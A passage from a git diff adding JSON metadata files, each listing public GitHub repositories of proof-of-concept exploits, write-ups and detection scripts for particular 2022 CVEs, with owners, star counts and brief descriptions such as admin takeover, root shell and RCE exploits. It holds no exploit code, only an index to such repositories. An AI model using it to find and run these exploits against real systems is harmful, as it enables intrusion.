"CVE-2022-22057_SM-F926U", + "full_name": "diabl0w\/CVE-2022-22057_SM-F926U", + "owner": { + "login": "diabl0w", + "id": 16129074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16129074?v=4", + "html_url": "https:\/\/github.com\/diabl0w", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diabl0w\/CVE-2022-22057_SM-F926U", + "description": null, + "fork": false, + "created_at": "2023-07-10T22:55:02Z", + "updated_at": "2024-07-14T09:49:07Z", + "pushed_at": "2023-07-11T23:15:53Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22063.json b/2022/CVE-2022-22063.json new file mode 100644 index 0000000000..45df48db22 --- /dev/null +++ b/2022/CVE-2022-22063.json @@ -0,0 +1,42 @@ +[ + { + "id": 582761070, + "name": "CVE-2022-22063", + "full_name": "msm8916-mainline\/CVE-2022-22063", + "owner": { + "login": "msm8916-mainline", + "id": 52102319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52102319?v=4", + "html_url": "https:\/\/github.com\/msm8916-mainline", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/msm8916-mainline\/CVE-2022-22063", + "description": "Security issue in the hypervisor firmware of some older Qualcomm chipsets", + "fork": false, + "created_at": "2022-12-27T19:48:30Z", + "updated_at": "2024-11-19T16:15:39Z", + "pushed_at": "2022-12-27T20:32:37Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": true, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "arm", + "cve", + "firmware", + "hypervisor", + "msm8916", + "qcom", + "qualcomm", + "security" + ], + "visibility": "public", + "forks": 2, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22274.json b/2022/CVE-2022-22274.json new file mode 100644 index 0000000000..4548adc86a --- /dev/null +++ b/2022/CVE-2022-22274.json @@ -0,0 +1,95 @@ +[ + { + "id": 588980352, + "name": "Sonic_CVE-2022-22274_poc", + "full_name": "4lucardSec\/Sonic_CVE-2022-22274_poc", + "owner": { + "login": "4lucardSec", + "id": 71567033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71567033?v=4", + "html_url": "https:\/\/github.com\/4lucardSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4lucardSec\/Sonic_CVE-2022-22274_poc", + "description": null, + "fork": false, + "created_at": "2023-01-14T17:15:53Z", + "updated_at": "2024-01-22T02:42:51Z", + "pushed_at": "2023-01-14T17:18:51Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 652282669, + "name": "CVE-2022-22274_poc", + "full_name": "forthisvideo\/CVE-2022-22274_poc", + "owner": { + "login": "forthisvideo", + "id": 136259454, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136259454?v=4", + "html_url": "https:\/\/github.com\/forthisvideo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/forthisvideo\/CVE-2022-22274_poc", + "description": null, + "fork": false, + "created_at": "2023-06-11T16:56:53Z", + "updated_at": "2023-06-11T16:57:33Z", + "pushed_at": "2023-06-11T16:57:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 742585090, + "name": "CVE-2022-22274_CVE-2023-0656", + "full_name": "BishopFox\/CVE-2022-22274_CVE-2023-0656", + "owner": { + "login": "BishopFox", + "id": 4523757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4523757?v=4", + "html_url": "https:\/\/github.com\/BishopFox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BishopFox\/CVE-2022-22274_CVE-2023-0656", + "description": null, + "fork": false, + "created_at": "2024-01-12T20:03:51Z", + "updated_at": "2024-11-28T00:21:37Z", + "pushed_at": "2024-01-12T20:15:47Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 19, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22296.json b/2022/CVE-2022-22296.json new file mode 100644 index 0000000000..09fd75a4a5 --- /dev/null +++ b/2022/CVE-2022-22296.json @@ -0,0 +1,33 @@ +[ + { + "id": 450430110, + "name": "CVE-2022-22296", + "full_name": "vlakhani28\/CVE-2022-22296", + "owner": { + "login": "vlakhani28", + "id": 42069316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42069316?v=4", + "html_url": "https:\/\/github.com\/vlakhani28", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vlakhani28\/CVE-2022-22296", + "description": "All Details about CVE-2022-22296", + "fork": false, + "created_at": "2022-01-21T09:29:21Z", + "updated_at": "2024-08-12T20:19:56Z", + "pushed_at": "2022-01-21T09:45:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22536.json b/2022/CVE-2022-22536.json new file mode 100644 index 0000000000..b862322abb --- /dev/null +++ b/2022/CVE-2022-22536.json @@ -0,0 +1,64 @@ +[ + { + "id": 459508869, + "name": "CVE-2022-22536", + "full_name": "ZZ-SOCMAP\/CVE-2022-22536", + "owner": { + "login": "ZZ-SOCMAP", + "id": 98105412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4", + "html_url": "https:\/\/github.com\/ZZ-SOCMAP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2022-22536", + "description": "SAP memory pipes(MPI) desynchronization vulnerability CVE-2022-22536.", + "fork": false, + "created_at": "2022-02-15T09:22:19Z", + "updated_at": "2024-09-19T01:53:19Z", + "pushed_at": "2022-02-21T08:58:22Z", + "stargazers_count": 50, + "watchers_count": 50, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 50, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 477106089, + "name": "SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536", + "full_name": "tess-ss\/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536", + "owner": { + "login": "tess-ss", + "id": 65326024, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65326024?v=4", + "html_url": "https:\/\/github.com\/tess-ss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tess-ss\/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536", + "description": null, + "fork": false, + "created_at": "2022-04-02T16:12:56Z", + "updated_at": "2024-05-28T15:57:46Z", + "pushed_at": "2022-04-02T16:57:00Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22555.json b/2022/CVE-2022-22555.json new file mode 100644 index 0000000000..9d9daec40f --- /dev/null +++ b/2022/CVE-2022-22555.json @@ -0,0 +1,33 @@ +[ + { + "id": 758383136, + "name": "cve-2022-22555", + "full_name": "colaoo123\/cve-2022-22555", + "owner": { + "login": "colaoo123", + "id": 136353760, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136353760?v=4", + "html_url": "https:\/\/github.com\/colaoo123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/colaoo123\/cve-2022-22555", + "description": null, + "fork": false, + "created_at": "2024-02-16T07:45:51Z", + "updated_at": "2024-02-16T07:50:14Z", + "pushed_at": "2024-02-16T07:50:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22582.json b/2022/CVE-2022-22582.json new file mode 100644 index 0000000000..74252905a0 --- /dev/null +++ b/2022/CVE-2022-22582.json @@ -0,0 +1,33 @@ +[ + { + "id": 470942701, + "name": "CVE-2022-22582", + "full_name": "poizon-box\/CVE-2022-22582", + "owner": { + "login": "poizon-box", + "id": 62810532, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62810532?v=4", + "html_url": "https:\/\/github.com\/poizon-box", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/poizon-box\/CVE-2022-22582", + "description": "exploits XAR – Arbitrary File Write", + "fork": false, + "created_at": "2022-03-17T10:16:27Z", + "updated_at": "2022-03-17T10:17:09Z", + "pushed_at": "2022-03-17T10:17:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22600.json b/2022/CVE-2022-22600.json new file mode 100644 index 0000000000..b3c05da0ce --- /dev/null +++ b/2022/CVE-2022-22600.json @@ -0,0 +1,33 @@ +[ + { + "id": 471589175, + "name": "MSF-screenrecord-on-MacOS", + "full_name": "KlinKlinKlin\/MSF-screenrecord-on-MacOS", + "owner": { + "login": "KlinKlinKlin", + "id": 45547668, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45547668?v=4", + "html_url": "https:\/\/github.com\/KlinKlinKlin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KlinKlinKlin\/MSF-screenrecord-on-MacOS", + "description": "CVE-2022-22600 Proof of Concept", + "fork": false, + "created_at": "2022-03-19T04:13:52Z", + "updated_at": "2024-10-03T01:12:28Z", + "pushed_at": "2022-03-19T02:46:12Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22620.json b/2022/CVE-2022-22620.json new file mode 100644 index 0000000000..a4ac95cbb0 --- /dev/null +++ b/2022/CVE-2022-22620.json @@ -0,0 +1,95 @@ +[ + { + "id": 503534541, + "name": "CVE-2022-22620", + "full_name": "kmeps4\/CVE-2022-22620", + "owner": { + "login": "kmeps4", + "id": 77245601, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77245601?v=4", + "html_url": "https:\/\/github.com\/kmeps4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kmeps4\/CVE-2022-22620", + "description": "CVE-2022-22620: Use-after-free in Safari", + "fork": false, + "created_at": "2022-06-14T22:08:14Z", + "updated_at": "2023-04-13T02:19:47Z", + "pushed_at": "2023-04-14T20:15:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 521162126, + "name": "CVE-2022-22620", + "full_name": "springsec\/CVE-2022-22620", + "owner": { + "login": "springsec", + "id": 44409706, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44409706?v=4", + "html_url": "https:\/\/github.com\/springsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/springsec\/CVE-2022-22620", + "description": "Webkit (Safari) - Exploit", + "fork": false, + "created_at": "2022-08-04T07:11:39Z", + "updated_at": "2024-08-25T14:05:16Z", + "pushed_at": "2022-08-09T13:43:27Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 627211251, + "name": "dkjiayu.github.io", + "full_name": "bb33bb\/dkjiayu.github.io", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/dkjiayu.github.io", + "description": "POC for cve-2022-22620", + "fork": false, + "created_at": "2023-04-13T02:20:40Z", + "updated_at": "2023-04-13T02:20:37Z", + "pushed_at": "2023-01-08T05:31:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22629.json b/2022/CVE-2022-22629.json new file mode 100644 index 0000000000..191e3e9ed7 --- /dev/null +++ b/2022/CVE-2022-22629.json @@ -0,0 +1,33 @@ +[ + { + "id": 534739259, + "name": "CVE-2022-22629", + "full_name": "parsdefense\/CVE-2022-22629", + "owner": { + "login": "parsdefense", + "id": 84011175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84011175?v=4", + "html_url": "https:\/\/github.com\/parsdefense", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/parsdefense\/CVE-2022-22629", + "description": "CVE-2022-22629 Proof of Concept", + "fork": false, + "created_at": "2022-09-09T17:21:27Z", + "updated_at": "2024-09-24T16:59:18Z", + "pushed_at": "2022-09-09T21:23:08Z", + "stargazers_count": 51, + "watchers_count": 51, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 51, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22639.json b/2022/CVE-2022-22639.json new file mode 100644 index 0000000000..6a2c265f40 --- /dev/null +++ b/2022/CVE-2022-22639.json @@ -0,0 +1,33 @@ +[ + { + "id": 470871002, + "name": "CVE-2022-22639", + "full_name": "jhftss\/CVE-2022-22639", + "owner": { + "login": "jhftss", + "id": 10210124, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10210124?v=4", + "html_url": "https:\/\/github.com\/jhftss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jhftss\/CVE-2022-22639", + "description": "CVE-2022-22639: Get a Root Shell on macOS Monterey", + "fork": false, + "created_at": "2022-03-17T06:16:54Z", + "updated_at": "2024-08-12T20:21:37Z", + "pushed_at": "2022-04-05T05:11:29Z", + "stargazers_count": 120, + "watchers_count": 120, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 120, + "score": 0, + "subscribers_count": 9 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22718.json b/2022/CVE-2022-22718.json new file mode 100644 index 0000000000..7d4f555401 --- /dev/null +++ b/2022/CVE-2022-22718.json @@ -0,0 +1,33 @@ +[ + { + "id": 502718850, + "name": "CVE-2022-22718", + "full_name": "ahmetfurkans\/CVE-2022-22718", + "owner": { + "login": "ahmetfurkans", + "id": 78302281, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78302281?v=4", + "html_url": "https:\/\/github.com\/ahmetfurkans", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahmetfurkans\/CVE-2022-22718", + "description": null, + "fork": false, + "created_at": "2022-06-12T20:18:00Z", + "updated_at": "2022-06-12T20:18:00Z", + "pushed_at": "2022-06-12T20:20:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22720.json b/2022/CVE-2022-22720.json new file mode 100644 index 0000000000..54633adddb --- /dev/null +++ b/2022/CVE-2022-22720.json @@ -0,0 +1,33 @@ +[ + { + "id": 723248102, + "name": "CVE-2022-22720", + "full_name": "Benasin\/CVE-2022-22720", + "owner": { + "login": "Benasin", + "id": 47447167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47447167?v=4", + "html_url": "https:\/\/github.com\/Benasin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Benasin\/CVE-2022-22720", + "description": null, + "fork": false, + "created_at": "2023-11-25T04:06:01Z", + "updated_at": "2023-11-25T04:06:54Z", + "pushed_at": "2023-11-25T04:06:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22733.json b/2022/CVE-2022-22733.json new file mode 100644 index 0000000000..22db38d4a7 --- /dev/null +++ b/2022/CVE-2022-22733.json @@ -0,0 +1,40 @@ +[ + { + "id": 632426945, + "name": "CVE-2022-22733", + "full_name": "Zeyad-Azima\/CVE-2022-22733", + "owner": { + "login": "Zeyad-Azima", + "id": 62406753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62406753?v=4", + "html_url": "https:\/\/github.com\/Zeyad-Azima", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zeyad-Azima\/CVE-2022-22733", + "description": "Apache ShardingSphere ElasticJob-UI Privilege Escalation & RCE Exploit", + "fork": false, + "created_at": "2023-04-25T11:39:40Z", + "updated_at": "2024-06-09T10:36:58Z", + "pushed_at": "2023-05-22T12:49:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "apache2", + "exploit", + "java", + "shardingsphere", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2274.json b/2022/CVE-2022-2274.json new file mode 100644 index 0000000000..ce1054f484 --- /dev/null +++ b/2022/CVE-2022-2274.json @@ -0,0 +1,107 @@ +[ + { + "id": 540972496, + "name": "CVE-2022-2274", + "full_name": "Malwareman007\/CVE-2022-2274", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-2274", + "description": "A POC OF CVE-2022-2274 (openssl)", + "fork": false, + "created_at": "2022-09-24T21:30:34Z", + "updated_at": "2024-08-12T20:27:18Z", + "pushed_at": "2022-09-24T21:37:16Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-2274", + "open-ssl", + "poc", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 564845020, + "name": "OpenSSL-Vulnerability-Detection-Script", + "full_name": "EkamSinghWalia\/OpenSSL-Vulnerability-Detection-Script", + "owner": { + "login": "EkamSinghWalia", + "id": 106553324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106553324?v=4", + "html_url": "https:\/\/github.com\/EkamSinghWalia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EkamSinghWalia\/OpenSSL-Vulnerability-Detection-Script", + "description": "This is an OpenSSL Vulnerability Detection Script for CVE-2022-2274", + "fork": false, + "created_at": "2022-11-11T16:27:45Z", + "updated_at": "2022-11-11T16:28:31Z", + "pushed_at": "2022-11-11T16:28:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604407954, + "name": "CVE-2022-2274", + "full_name": "DesmondSanctity\/CVE-2022-2274", + "owner": { + "login": "DesmondSanctity", + "id": 51109125, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51109125?v=4", + "html_url": "https:\/\/github.com\/DesmondSanctity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DesmondSanctity\/CVE-2022-2274", + "description": "OpenSSL-src Heap Memory Corruption with RSA Private Key Operation : CVE-2022-2274", + "fork": false, + "created_at": "2023-02-21T01:56:51Z", + "updated_at": "2023-02-21T13:15:47Z", + "pushed_at": "2023-02-21T02:09:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "advisory", + "security", + "vulnerabilities", + "vulnerability-assessment" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22814.json b/2022/CVE-2022-22814.json new file mode 100644 index 0000000000..557b23631a --- /dev/null +++ b/2022/CVE-2022-22814.json @@ -0,0 +1,33 @@ +[ + { + "id": 496813493, + "name": "CVE-2022-22814_PoC", + "full_name": "DShankle\/CVE-2022-22814_PoC", + "owner": { + "login": "DShankle", + "id": 44985044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44985044?v=4", + "html_url": "https:\/\/github.com\/DShankle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DShankle\/CVE-2022-22814_PoC", + "description": null, + "fork": false, + "created_at": "2022-05-27T00:33:39Z", + "updated_at": "2022-08-29T17:18:20Z", + "pushed_at": "2022-08-16T20:20:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22818.json b/2022/CVE-2022-22818.json new file mode 100644 index 0000000000..ca7fc2c7b2 --- /dev/null +++ b/2022/CVE-2022-22818.json @@ -0,0 +1,33 @@ +[ + { + "id": 576619933, + "name": "django-xss-example", + "full_name": "Prikalel\/django-xss-example", + "owner": { + "login": "Prikalel", + "id": 67920266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67920266?v=4", + "html_url": "https:\/\/github.com\/Prikalel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Prikalel\/django-xss-example", + "description": "This repo reproduce xss attack on django 4.0.1 (see CVE-2022-22818)", + "fork": false, + "created_at": "2022-12-10T12:38:08Z", + "updated_at": "2024-08-12T20:28:48Z", + "pushed_at": "2023-06-02T04:06:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22822.json b/2022/CVE-2022-22822.json new file mode 100644 index 0000000000..73748124c9 --- /dev/null +++ b/2022/CVE-2022-22822.json @@ -0,0 +1,33 @@ +[ + { + "id": 480403914, + "name": "external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827", + "full_name": "nanopathi\/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827", + "description": null, + "fork": false, + "created_at": "2022-04-11T13:57:41Z", + "updated_at": "2022-04-11T14:18:10Z", + "pushed_at": "2023-07-20T14:53:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22828.json b/2022/CVE-2022-22828.json new file mode 100644 index 0000000000..9e057abc78 --- /dev/null +++ b/2022/CVE-2022-22828.json @@ -0,0 +1,33 @@ +[ + { + "id": 452487266, + "name": "CVE-2022-22828", + "full_name": "videnlabs\/CVE-2022-22828", + "owner": { + "login": "videnlabs", + "id": 97770137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97770137?v=4", + "html_url": "https:\/\/github.com\/videnlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/videnlabs\/CVE-2022-22828", + "description": "Write-up of CVE-2022-22828", + "fork": false, + "created_at": "2022-01-27T00:29:47Z", + "updated_at": "2022-01-27T01:53:47Z", + "pushed_at": "2022-01-27T01:32:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22845.json b/2022/CVE-2022-22845.json new file mode 100644 index 0000000000..c8ea78034a --- /dev/null +++ b/2022/CVE-2022-22845.json @@ -0,0 +1,33 @@ +[ + { + "id": 463162355, + "name": "CVE-2022-22845-Exploit", + "full_name": "OmriBaso\/CVE-2022-22845-Exploit", + "owner": { + "login": "OmriBaso", + "id": 50461376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50461376?v=4", + "html_url": "https:\/\/github.com\/OmriBaso", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OmriBaso\/CVE-2022-22845-Exploit", + "description": "Exploit for CVE-2022-22845 - Unauthenticated Admin Takeover On QXIP SIPCAPTURE Homer-App up to 1.4.27", + "fork": false, + "created_at": "2022-02-24T13:40:12Z", + "updated_at": "2023-09-22T16:54:32Z", + "pushed_at": "2022-02-24T13:44:21Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22850.json b/2022/CVE-2022-22850.json new file mode 100644 index 0000000000..a0e4064ca1 --- /dev/null +++ b/2022/CVE-2022-22850.json @@ -0,0 +1,33 @@ +[ + { + "id": 451154958, + "name": "CVE-2022-22850", + "full_name": "Sant268\/CVE-2022-22850", + "owner": { + "login": "Sant268", + "id": 26564273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26564273?v=4", + "html_url": "https:\/\/github.com\/Sant268", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sant268\/CVE-2022-22850", + "description": null, + "fork": false, + "created_at": "2022-01-23T16:00:34Z", + "updated_at": "2022-01-24T06:20:46Z", + "pushed_at": "2022-01-27T02:37:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22851.json b/2022/CVE-2022-22851.json new file mode 100644 index 0000000000..bbcd4df0f8 --- /dev/null +++ b/2022/CVE-2022-22851.json @@ -0,0 +1,33 @@ +[ + { + "id": 451155234, + "name": "CVE-2022-22851", + "full_name": "Sant268\/CVE-2022-22851", + "owner": { + "login": "Sant268", + "id": 26564273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26564273?v=4", + "html_url": "https:\/\/github.com\/Sant268", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sant268\/CVE-2022-22851", + "description": null, + "fork": false, + "created_at": "2022-01-23T16:01:26Z", + "updated_at": "2022-01-24T06:20:47Z", + "pushed_at": "2022-01-27T03:04:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + 